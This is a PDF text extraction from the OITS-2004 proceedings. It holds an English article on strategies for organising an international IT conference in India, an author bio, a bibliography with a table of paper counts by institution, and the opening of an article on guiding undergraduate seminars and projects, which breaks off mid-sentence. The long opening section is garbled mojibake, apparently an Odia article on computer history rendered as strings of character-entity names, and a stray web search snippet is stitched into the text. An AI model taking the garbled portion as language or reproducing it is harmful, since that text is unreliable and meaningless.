OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 28: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

